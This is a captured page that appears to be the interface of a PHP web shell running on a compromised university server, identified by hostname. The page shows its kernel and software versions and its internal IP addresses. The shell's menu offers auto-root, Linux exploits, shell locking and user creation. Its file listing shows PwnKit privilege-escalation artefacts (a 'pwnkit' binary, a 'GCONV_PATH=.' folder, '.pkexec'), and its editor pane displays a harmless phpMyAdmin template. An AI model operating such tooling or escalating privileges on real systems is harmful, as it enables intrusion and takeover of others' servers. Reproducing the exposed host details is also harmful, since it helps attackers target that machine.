Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
phpmyadmin /
tmp /
twig /
d7 /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
d781c7677c45974c404e480d40948bee.php
2.38
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : d781c7677c45974c404e480d40948bee.php
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; /* server/privileges/subnav.twig */ class __TwigTemplate_87f62ee7d08d2a9910d6b4f910209195 extends Template { private $source; private $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->parent = false; $this->blocks = [ ]; } protected function doDisplay(array $context, array $blocks = []) { $macros = $this->macros; // line 1 echo "<div class=\"row\"> <ul class=\"nav nav-pills m-2\"> <li class=\"nav-item\"> <a class=\"nav-link"; // line 4 echo (((($context["active"] ?? null) == "privileges")) ? (" active") : ("")); echo "\" href=\""; echo PhpMyAdmin\Url::getFromRoute("/server/privileges", ["viewing_mode" => "server"]); echo "\"> "; echo _gettext("User accounts overview"); // line 6 echo " </a> </li> "; // line 8 if (($context["is_super_user"] ?? null)) { // line 9 echo " <li class=\"nav-item\"> <a class=\"nav-link"; // line 10 echo (((($context["active"] ?? null) == "user-groups")) ? (" active") : ("")); echo "\" href=\""; echo PhpMyAdmin\Url::getFromRoute("/server/user-groups"); echo "\"> "; echo _gettext("User groups"); // line 12 echo " </a> </li> "; } // line 15 echo " </ul> </div> "; } public function getTemplateName() { return "server/privileges/subnav.twig"; } public function isTraitable() { return false; } public function getDebugInfo() { return array ( 70 => 15, 65 => 12, 58 => 10, 55 => 9, 53 => 8, 49 => 6, 42 => 4, 37 => 1,); } public function getSourceContext() { return new Source("", "server/privileges/subnav.twig", "/opt/lampp/phpmyadmin/templates/server/privileges/subnav.twig"); } }
Close